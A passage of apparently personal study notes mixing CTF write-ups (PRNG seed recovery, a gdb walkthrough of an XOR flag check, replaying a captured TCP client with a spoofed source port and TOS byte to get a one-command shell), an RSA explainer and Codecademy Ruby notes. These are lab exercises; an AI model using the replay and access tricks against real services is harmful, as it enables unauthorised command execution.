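        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -ev(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](ev(node.left), ev(node.right))
        raise ValueError("disallowed syntax: " + ast.dump(node))
    return ev(ast.parse(expr, mode="eval"))


def solve(jar_text):
    """URL-decode the challenge cookie and compute the answer to POST back."""
    encoded = challenge_from_jar(jar_text)
    if encoded is None:
        raise ValueError("no challenge cookie in jar")
    value = safe_eval(unquote_plus(encoded))   # "12+%2B+7+%2A+3" -> "12 + 7 * 3"
    return int(value) if float(value).is_integer() else value
```

`bc -l` prints divisions with 20 decimals; whether the server wants that or an integer is not shown, so solve() returns an int when the result is integral and a float otherwise.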

# CSCamp CTF Quals 2k13: Crypto - Predictor


can you predict the next number in the sequence?

[51751041,236753494,190402293,48644501,297659248,230684862,7697029,173742959,126005793]

The code used to create those numbers is

import random
i = 295075153L
x = random.randint(0, i)
y = random.randint(0, i)
for j in range (1,10):
    x = (2*x + 5) % i
    y = (3*y + 7) % i
    print (x^y)

The flag will be the next number in the sequence

# cat predictor.py
#!/usr/bin/python

import random 

i = 295075153

def sequence(x,y):
 for j in range (1,11):
  x = (2*x + 5) % i
  y = (3*y + 7) % i
  print (x^y)

y = 0
while True:
 y1 = (3*y + 7) % i
 x1 = y1^51751041
 x2 = (2*x1 + 5) % i
 y2 = (3*y1 + 7) % i
 if x2^y2 == 236753494:
  print "y = " + str(y)
  x = 0
  '''
  while True:
   if x1 == (2*x + 5) % i:
    print "x = " + str(x)
    sequence(x,y)
    exit()
   x += 1
  '''
  x = (i + x1 - 5) / 2
  print "x = " + str(x)
  sequence(x,y)
  exit()
 y += 1
# ./predictor.py
y = 173565935
x = 268355495
51751041
236753494
190402293
48644501
297659248
230684862
7697029
173742959
126005793
103605566
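
The generator is two affine maps whose states are XORed, so the only real unknown is y: fix a candidate y, then x_1 = out_0 ^ y_1 and x follows by inverting x_1 = 2x + 5 mod i. An added example (not the challenge's or the writeup's code) that packages that reasoning: it inverts the x step with the modular inverse of 2, which covers both parities of x_1 - 5 (predictor.py's (i + x1 - 5) / 2 is right when x_1 - 5 is odd, as it is here), accepts a candidate only if it reproduces every given output, and takes the modulus as a parameter so the whole search can be exercised on a small constructed instance. Over the real modulus the search is about 3·10^8 candidates, the same job predictor.py did.

```python
# Values from the challenge and from the predictor.py run above.
MODULUS = 295075153
OUTPUTS = [51751041, 236753494, 190402293, 48644501, 297659248,
           230684862, 7697029, 173742959, 126005793]
RECOVERED_X, RECOVERED_Y = 268355495, 173565935   # seeds printed by predictor.py


def generate(x, y, count, modulus=MODULUS):
    """Run the challenge generator and return the first `count` values of x^y."""
    out = []
    for _ in range(count):
        x = (2 * x + 5) % modulus
        y = (3 * y + 7) % modulus
        out.append(x ^ y)
    return out


def invert_x_step(x1, modulus=MODULUS):
    """Undo x1 = (2*x + 5) mod modulus exactly, using the inverse of 2.

    For an odd modulus inv(2) = (modulus + 1) // 2. This is what predictor.py's
    (i + x1 - 5) / 2 computes when x1 - 5 is odd; the multiplication form
    also handles the even case."""
    assert modulus % 2 == 1, "inverse of 2 needs an odd modulus"
    inv2 = (modulus + 1) // 2
    return ((x1 - 5) * inv2) % modulus


def recover_seeds(outputs, modulus=MODULUS, y_range=None):
    """Brute-force the y seed; x follows from the first output.

    y_1 = 3y + 7 is cheap, x_1 = outputs[0] ^ y_1, and x = inv(x_1).
    A candidate is accepted only if it reproduces every given output."""
    for y in (y_range if y_range is not None else range(modulus)):
        y1 = (3 * y + 7) % modulus
        x1 = outputs[0] ^ y1
        if x1 >= modulus:
            continue                      # no real x_1 can be that large
        x = invert_x_step(x1, modulus)
        if generate(x, y, len(outputs), modulus) == outputs:
            return x, y
    return None


def predict_next(outputs, modulus=MODULUS, y_range=None):
    """The flag: the value the generator would print after `outputs`."""
    seeds = recover_seeds(outputs, modulus, y_range)
    if seeds is None:
        return None
    x, y = seeds
    return generate(x, y, len(outputs) + 1, modulus)[-1]


if __name__ == "__main__":
    # Full search over the real modulus; the y_range argument narrows it.
    print(predict_next(OUTPUTS))
```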

# RSA operation


Key generation

p # prime number
q # prime number
n # modulus
n = p * q

totient_n = (p - 1) * (q - 1) # Euler's totient of n

e # public key exponent
1 < e < totient_n and gcd(e, totient_n) = 1

d # private key exponent, the inverse of e modulo totient_n: (e * d) % totient_n == 1

# Method 1
d = gmpy.invert(e, totient_n)

# Method 2 (extended Euclidean algorithm)
def egcd(a, b):
 if a == 0:
  return (b, 0, 1)
 else:
  g, y, x = egcd(b % a, a)
  return (g, x - (b // a) * y, y)

def modinv(a, m):
 g, x, y = egcd(a, m)
 if g != 1:
  return None  # modular inverse does not exist
 else:
  return x % m

d = modinv(e, totient_n)

# Method 3 (linear search, only feasible for toy-sized keys)
d = 1
while True:
 if (e * d - 1) % totient_n == 0:
  print d
  break
 else:
  d += 1

(e, n) # public key
(d, n) # private key

Example

p = 61
q = 53
n = 53 * 61 = 3233
totient(3233) = (53 - 1) * (61 - 1) = 3120
e = 17
d = modinv(17, 3120) = 2753

(17, 3233) # public key
(2753, 3233) # private key

m = 65 # message
c # ciphertext

Encryption

c = m**e % n = pow(m, e, n)
c = 65**17 % 3233 = pow(65, 17, 3233) = 2790

Decryption

m = c**d % n = pow(c, d, n)
m = 2790**2753 % 3233 = pow(2790, 2753, 3233) = 65

# CRT (to speed up calculation)
dp = d % (p - 1) = 2753 % (61 - 1) = 53
dq = d % (q - 1) = 2753 % (53 - 1) = 49
qinv = modinv(q, p) = modinv(53, 61) = 38
m1 = c**dp % p = 2790**53 % 61 = 4
m2 = c**dq % q = 2790**49 % 53 = 12
h = (qinv * (m1 - m2)) % p = (38 * (4 - 12)) % 61 = 1
m = m2 + (h * q) = 12 + (1 * 53)= 65
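
The key generation, encryption, decryption and CRT steps above collected into one runnable module (an added example, not the page's own code). keygen() is also the operation rsatool.py performed in the factorisation writeup further up, where p, q and e were known and only d had to be derived. Note that textbook RSA as shown here has no padding: it is deterministic and malleable, so real deployments wrap messages with OAEP (or use a library that does) rather than calling pow on the raw message.

```python
from math import gcd


def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y = g = gcd(a, b)."""
    if a == 0:
        return b, 0, 1
    g, y, x = egcd(b % a, a)
    return g, x - (b // a) * y, y


def modinv(a, m):
    """Inverse of a modulo m; raises if gcd(a, m) != 1."""
    g, x, _ = egcd(a % m, m)
    if g != 1:
        raise ValueError("no inverse: gcd(%d, %d) = %d" % (a, m, g))
    return x % m


def keygen(p, q, e):
    """Derive the full private key from the two primes and the public exponent.

    Once n is factored this is all an attacker needs: d is one modular
    inverse away, and the CRT parameters follow from d, p and q."""
    n = p * q
    totient_n = (p - 1) * (q - 1)
    if not (1 < e < totient_n) or gcd(e, totient_n) != 1:
        raise ValueError("e must lie in (1, totient(n)) and be coprime to totient(n)")
    d = modinv(e, totient_n)
    return {
        "n": n, "e": e, "d": d, "p": p, "q": q,
        # CRT parameters, precomputed once at key generation
        "dp": d % (p - 1), "dq": d % (q - 1), "qinv": modinv(q, p),
    }


def encrypt(m, key):
    """Textbook RSA: c = m^e mod n. Requires 0 <= m < n."""
    if not 0 <= m < key["n"]:
        raise ValueError("message must be smaller than the modulus")
    return pow(m, key["e"], key["n"])


def decrypt(c, key):
    """m = c^d mod n, one full-size exponentiation."""
    return pow(c, key["d"], key["n"])


def decrypt_crt(c, key):
    """Same result as decrypt(), with two half-size exponentiations instead."""
    m1 = pow(c, key["dp"], key["p"])
    m2 = pow(c, key["dq"], key["q"])
    h = (key["qinv"] * (m1 - m2)) % key["p"]
    return m2 + h * key["q"]


if __name__ == "__main__":
    key = keygen(61, 53, 17)          # the toy key worked through above
    c = encrypt(65, key)
    print(key["d"], c, decrypt(c, key), decrypt_crt(c, key))
```

decrypt_crt() returns m2 + h*q without a final reduction because h < p guarantees the sum is below p*q = n, which is why the worked example ends at 12 + 1*53 = 65.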

References

https://en.wikipedia.org/wiki/RSA_(cryptosystem)
https://en.wikipedia.org/wiki/Chinese_remainder_theorem
https://factordb.com

# Codecademy: Ruby


1. Introduction to Ruby

my_num = 25
my_boolean = true
my_string = "Ruby"

3+3
3-3
3*3
3/3
3**3
3%3

puts "What's up" # newline
print "Montalvo"

"I love espresso".length
"Eric".reverse
puts "eric".upcase
puts "ERIC".downcase
puts "Eric".downcase.reverse.upcase

=begin
I'm a comment!
I don't need any # symbols.
=end

print "What's your first name?"
first_name = gets.chomp
first_name.capitalize!
puts "Your name is #{first_name}"
2. Control Flow in Ruby

x = 1
y = 2
if x < y
  puts "x is less than y!"
elsif x > y
  puts "x is greater than y!"
else
  puts "x equals y!"
end

hungry = false
unless hungry
  puts "I'm writing Ruby programs!"
else
  puts "Time to eat!"
end

is_true = 2 != 3
is_false = 2 == 3
test_1 = 17 > 16
test_2 = 21 < 30
test_3 = 9 >= 9
test_4 = -11 <= 4

true && true # => true
false || false # => false
!true # => false
(3 < 4 || false) && (false || true)
3. Looping with Ruby

counter = 1
while counter < 11
  puts counter
  counter += 1
end

counter = 1
until counter > 11
  puts counter
  counter += 1
end

for num in 1...10 # 1-9
  puts num
end

for num in 1..10 # 1-10
  puts num
end

i = 20
loop do
  i -= 1
  next if i % 2 != 0
  print "#{i}"
  break if i <= 0
end

my_array = [1,2,3,4,5]

array = [1,2,3,4,5]
array.each do |x|
  x += 10
  print "#{x}"
end

odds = [1,3,5,7,9]
odds.each do |n|
  print n*2
end

10.times { print "Chunky bacon!" }
4. Arrays and Hashes

demo_array = [100, 200, 300, 400, 500]
print demo_array[2]

multi_d_array = [[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0]]
multi_d_array.each { |x| puts "#{x}\n" }

my_hash = {
  "name" => "Eric",
  "age" => 26,
  "hungry?" => true
}
puts my_hash["name"]
puts my_hash["age"]
puts my_hash["hungry?"]

pets = Hash.new
pets["Stevie"] = "cat"
pets["John"] = "dog"
pets.each { |x, y| puts "#{x}: #{y}" }
5. Blocks and Sorting

def puts_1_to_10
  (1..10).each { |i| puts i }
end
puts_1_to_10

def cubertino(n)
  puts n ** 3
end
cubertino(8)

def what_up(greeting, *bros)
  bros.each { |bro| puts "#{greeting}, #{bro}!" }
end
what_up("What up", "Justin", "Ben", "Kevin Sorbo")

my_array = [3, 4, 8, 7, 1, 6, 5, 9, 2]
my_array.sort!

book_1 = "A Wrinkle in Time"
book_2 = "A Brief History of Time"
c = book_1 <=> book_2 # -1 if book_1 < book_2, 0 if equal, 1 if book_1 > book_2 (here 1)
6. Hashes and Symbols

symbol_hash = {
  :symbol1 => 1, # symbol1: 1,
  :symbol2 => 2, # symbol2: 2,
  :symbol3 => 3  # symbol3: 3
}

strings = ["HTML", "CSS", "JavaScript", "Python", "Ruby"]
symbols = Array.new
strings.each do |string|
    symbols.push(string.to_sym) # or string.intern
end

movie_ratings = {
  memento: 1,
  primer: 2,
  the_matrix: 3,
}
good_movies = movie_ratings.select { |m, r| r > 2 }
movie_ratings.each_key { |k| puts k }
movie_ratings.each_value { |v| puts v }
7. Refactoring

ruby_is_eloquent = true
ruby_is_ugly = false
puts "Ruby is eloquent!" if ruby_is_eloquent
puts "Ruby's not ugly!" unless ruby_is_ugly

puts 1>0 ? "True" : "False" # Ternary conditional expression

greeting = "English"
case greeting
  when "English" then puts "Hello!"
  when "French"  then puts "Bonjour!"
  when "German"  then puts "Guten Tag!"
  when "Finnish" then puts "Haloo!"
  else puts "I don't know that language!"
end

favorite_book = nil
favorite_book ||= "Guide to Ruby" # set
favorite_book ||= "Guide to Perl" # not set

def add(a,b)
  return a + b # a + b (without return)
end

"L".upto("P") { |l| puts l }

age = 26
age.respond_to?(:next) # true (27)

alphabet = ["a", "b", "c"]
alphabet << "d" # alphabet.push("d")
caption = "A giraffe surrounded by "
caption << "weezards!" # caption += "weezards!"

age = 26
"I am " + age.to_s + " years old."
"I am " << age.to_s << " years old."
"I am #{age} years old."
8. Blocks, Procs, and Lambdas

fibs = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55]
doubled_fibs = fibs.collect { |f| f*2 }

def double(p)
  yield p
end
double(1){ |x| x*2 }

floats = [1.2, 3.45, 0.91, 7.727, 11.42, 482.911]
round_down = Proc.new { |x| x.floor }
ints = floats.collect(&round_down)

hi = Proc.new { puts "Hello!" }
hi.call

numbers_array = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
strings_array = numbers_array.collect(&:to_s)

strings = ["leonardo", "donatello", "raphael", "michaelangelo"]
symbolize = lambda { |s| s.to_sym }
symbols = strings.collect(&symbolize)
9. Object-Oriented Programming, Part I

class Person
  def initialize(name)
    @name = name
  end
end
me = Person.new("Eric")

class MyClass
  $my_variable = "Hello!" # global var
end
puts $my_variable

class Person
  @@people_count = 0 # class variable
  def initialize(name,age,profession)
    @name = name # instance var
    @age = age
    @profession = profession
  end
end

class ApplicationError
  def display_error
    puts "Error! Error!"
  end
end
class SuperBadError < ApplicationError # inheritance
  def display_error # override
    puts "SuperError! SuperError!"
    super # call parent method
  end
end
err = SuperBadError.new
err.display_error
10. Object-Oriented Programming, Part II

class Dog
  def initialize(name,breed)
    @name = name
    @breed = breed
  end
  public
  def bark
    puts "Woof!"
  end
  private
  def id
    @id_number = 12345
  end
end

module Circle
  PI = 3.141592653589793
  def Circle.area(radius)
    PI * radius**2
  end
  def Circle.circumference(radius)
    2 * PI * radius
  end
end

puts Math::PI
require 'date'
puts Date.today

module Action
  def jump
    @distance = rand(4) + 2
    puts "I jumped forward #{@distance} feet!"
  end
end
class Rabbit
  include Action
  attr_reader :name
  def initialize(name)
    @name = name
  end
end
peter = Rabbit.new("Peter")
peter.jump

module ThePresent
  def now
    puts "Time"
  end
end
class TheHereAnd
  extend ThePresent
end
TheHereAnd.now

# NcN CTF 2k13: Australia (Base - 500 pts)


# file derp
derp: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.26, BuildID[sha1]=0xbf6173b70ab3b4daee58d25e06e33f1738444a18, not stripped
# chmod +x derp
# echo 0 > /proc/sys/kernel/randomize_va_space
# gdb --quiet ./derp
(gdb) set disassembly-flavor intel
(gdb) break main
(gdb) run
(gdb) disassemble main
(gdb) x/6i 0x080483a4
   0x80483a4 <main+208>: mov    eax,ds:0x80d1088
   0x80483a9 <main+213>: sub    eax,0x2
   0x80483ac <main+216>: mov    DWORD PTR [esp+0x4],eax
   0x80483b0 <main+220>: mov    eax,DWORD PTR [esp+0x1c]
   0x80483b4 <main+224>: mov    DWORD PTR [esp],eax
   0x80483b7 <main+227>: call   0x804841a <check_buffer>
(gdb) x/xw 0x80d1088
0x80d1088 <goodboy_len>: 0x00000042
(gdb) break *0x80483b7
(gdb) continue
Continuing.
Facebook CTF
Enter flag: cookie

Breakpoint 2, 0x080483b7 in main ()
(gdb) info registers eax
eax            0x80d5298 135090840
(gdb) x/s 0x80d5298
0x80d5298:  "cookie\n"
(gdb) break *0x804841a
(gdb) continue
(gdb) disassemble
(gdb) x/3i 0x0804849c
=> 0x804849c <check_buffer+130>: mov    eax,DWORD PTR [ebp-0x4]
   0x804849f <check_buffer+133>: cmp    eax,DWORD PTR [ebp+0xc]
   0x80484a2 <check_buffer+136>: jb     0x804843c <check_buffer+34>
(gdb) break *0x0804849c
(gdb) continue
(gdb) x/xb $ebp-0x4
0xffffd4e4: 0x00
(gdb) x/xb $ebp+0xc
0xffffd4f4: 0x40
(gdb) x/64xb 0x080b2224
0x80b2224: 0xeb 0xe8 0xbf 0xe4 0xea 0xbe 0xba 0xe4
0x80b222c: 0xe5 0xea 0xe8 0xea 0xe8 0xee 0xe9 0xba
0x80b2234: 0xea 0xe8 0xeb 0xba 0xbf 0xba 0xeb 0xea
0x80b223c: 0xe8 0xef 0xbd 0xba 0xed 0xe9 0xba 0xee
0x80b2244: 0xe9 0xed 0xbe 0xed 0xe4 0xea 0xbe 0xba
0x80b224c: 0xe9 0xe4 0xbd 0xea 0xb8 0xe9 0xb8 0xbf
0x80b2254: 0xeb 0xb9 0xbe 0xe4 0xbe 0xba 0xe5 0xbf
0x80b225c: 0xba 0xbf 0xe5 0xb8 0xec 0xe8 0xbf 0xb8
(gdb) x/3i 0x0804848b
=> 0x804848b <check_buffer+113>: xor    eax,ecx
   0x804848d <check_buffer+115>: cmp    dl,al
   0x804848f <check_buffer+117>: je     0x8048498 <check_buffer+126>
(gdb) break *0x0804848b
(gdb) continue
(gdb) info registers eax
eax            0xdc 220
(gdb) info registers ecx
ecx            0x63 99
(gdb) info registers edx
edx            0xeb 235
(gdb) quit
# python -c 'list=[0xeb,0xe8,0xbf,0xe4,0xea,0xbe,0xba,0xe4,0xe5,0xea,0xe8,0xea,0xe8,0xee,0xe9,0xba,0xea,0xe8,0xeb,0xba,0xbf,0xba,0xeb,0xea,0xe8,0xef,0xbd,0xba,0xed,0xe9,0xba,0xee,0xe9,0xed,0xbe,0xed,0xe4,0xea,0xbe,0xba,0xe9,0xe4,0xbd,0xea,0xb8,0xe9,0xb8,0xbf,0xeb,0xb9,0xbe,0xe4,0xbe,0xba,0xe5,0xbf,0xba,0xbf,0xe5,0xb8,0xec,0xe8,0xbf,0xb8]; print "".join(chr(i^0xdc) for i in list)' | ./derp
Facebook CTF
Enter flag: Winner! Post your flag.
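
check_buffer XORs each input byte with the value in eax (0xdc) and compares the result with the 64-byte table at 0x080b2224, so the one-liner above recovers the flag by XORing the table with that key. An added example, not the writeup's code, that carries the bytes from the gdb dump above and shows the two other ways to get the key once the table is known: from one known plaintext byte (expected ^ plain), and with no known plaintext at all by trying all 256 keys and keeping those whose decode stays inside the expected alphabet; for this table only 0xdc yields pure hex digits, while a looser printable-ASCII filter leaves several candidates to inspect by hand.

```python
import string

# The 64 bytes dumped with x/64xb 0x080b2224 above (copied from the gdb output).
EXPECTED = bytes.fromhex(
    "ebe8bfe4eabebae4" "e5eae8eae8eee9ba" "eae8ebbabfbaebea" "e8efbdbaede9baee"
    "e9edbeede4eabeba" "e9e4bdeab8e9b8bf" "ebb9bee4bebae5bf" "babfe5b8ece8bfb8"
)
KEY_FROM_EAX = 0xDC   # eax at the xor in check_buffer

HEX_ALPHABET = set(b"0123456789abcdef")
PRINTABLE = set(string.printable.encode())


def xor_decode(data, key):
    """Invert check_buffer's test input[i] ^ key == expected[i]."""
    return bytes(b ^ key for b in data)


def key_from_known_byte(expected_byte, plain_byte):
    """With one plaintext byte known, a single-byte XOR key falls out directly."""
    return expected_byte ^ plain_byte


def candidate_keys(data, alphabet):
    """All single-byte keys whose decode of `data` stays inside `alphabet`.

    The tighter the alphabet, the fewer keys survive; a flag known to be a
    hex digest leaves exactly one."""
    return [k for k in range(256) if all((b ^ k) in alphabet for b in data)]


if __name__ == "__main__":
    print(xor_decode(EXPECTED, KEY_FROM_EAX).decode())
    print([hex(k) for k in candidate_keys(EXPECTED, HEX_ALPHABET)])
```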

# NcN CTF 2k13: USA (Flag)


# tcpflow -C -r traffic.pcap
HELLO! What do you want? 
ERMAHGERD_LEMME_EXECUTE

FINE!
Only one command...
$ 
# tshark -n -q -r traffic.pcap -z "follow,tcp,ascii,0"
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 192.168.100.15:6969
Node 1: 192.168.100.254:45887
26
 HELLO! What do you want? 
 24
ERMAHGERD_LEMME_EXECUTE

33
 FINE!
 Only one command...
 $ 
===================================================================
# scapy
>>> us=rdpcap("traffic.pcap")
>>> us[0]
<Ether  dst=00:16:3e:63:a1:f6 src=fe:ff:ff:ff:ff:ff type=0x800 |<IP  version=4L ihl=5L tos=0x90 len=60 id=47950 flags=DF frag=0L ttl=64 proto=tcp chksum=0x347f src=192.168.100.254 dst=192.168.100.15 options=[] |<TCP  sport=45887 dport=6969 seq=201010478 ack=0 dataofs=10L reserved=0L flags=S window=14600 chksum=0x4a8d urgptr=0 options=[('MSS', 1460), ('SAckOK', ''), ('Timestamp', (2070112, 0)), ('NOP', None), ('WScale', 7)] |>>>
>>> exit()
# iptables --table mangle --append PREROUTING --dport 6969 --jump TOS --set-tos 0x90
# nc --source-port 45887 192.168.69.5 6969
HELLO! What do you want? ERMAHGERD_LEMME_EXECUTE
FINE!
Only one command...
$ echo 'CookieMonsters' > /tmp/SCORE_POINTS
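
The replay above reproduces two properties of the captured client: its source port (45887) and the IP TOS byte 0x90 shown in the scapy dump, using an iptables TOS mangle rule plus nc --source-port. Two caveats on that rule: iptables accepts --dport only together with -p tcp, and locally generated packets traverse the mangle OUTPUT chain, not PREROUTING. An added example (not the writeup's code) sets both properties directly on a socket instead: IP_TOS via setsockopt and the source port via bind(), then walks the captured dialogue. Because it cannot reach the CTF box, it ships with a constructed loopback stand-in that records the peer's source port and answers with the captured strings; the command it sends (`id`) is a placeholder.

```python
import socket
import threading

# The three messages from the tcpflow/tshark output above.
BANNER = b"HELLO! What do you want? "
SECRET = b"ERMAHGERD_LEMME_EXECUTE\n"
PROMPT = b"FINE!\nOnly one command...\n$ "


def start_fake_service(host="127.0.0.1"):
    """Constructed loopback stand-in for the challenge service (not the real one).

    Records the client's source port, then plays the captured dialogue.
    Returns (listening_port, seen); `seen` is filled in by the server thread."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    seen = {}

    def serve():
        conn, peer = srv.accept()
        srv.close()
        with conn:
            seen["peer_port"] = peer[1]
            conn.sendall(BANNER)
            seen["request"] = conn.recv(1024)
            if seen["request"] != SECRET:
                conn.sendall(b"NO!\n")
                return
            conn.sendall(PROMPT)
            seen["command"] = conn.recv(1024)

    threading.Thread(target=serve, daemon=True).start()
    return port, seen


def replay(host, port, source_port=45887, tos=0x90, command=b"id\n"):
    """Reproduce the captured client with a plain socket.

    setsockopt(IP_TOS) does what the iptables TOS mangle rule was for, and
    bind() to a fixed port does what nc --source-port did. Returns the TOS the
    kernel reports for the socket plus the two server replies."""
    cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    cli.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # tolerate TIME_WAIT on the port
    cli.setsockopt(socket.IPPROTO_IP, socket.IP_TOS, tos)
    cli.bind(("", source_port))
    cli.settimeout(5)
    with cli:
        cli.connect((host, port))
        tos_set = cli.getsockopt(socket.IPPROTO_IP, socket.IP_TOS)
        banner = cli.recv(1024)
        cli.sendall(SECRET)
        reply = cli.recv(1024)
        if reply == PROMPT:
            cli.sendall(command)
    return {"tos": tos_set, "banner": banner, "reply": reply}


if __name__ == "__main__":
    port, seen = start_fake_service()
    print(replay("127.0.0.1", port))
    print("server saw source port", seen["peer_port"])
```

Against the real target, call replay("192.168.69.5", 6969) and replace the placeholder command with the one from the writeup; whether the service also checks other header fields (TTL, window, TCP options) is not visible from the tshark output, so compare a fresh capture of the replay against traffic.pcap if it still refuses.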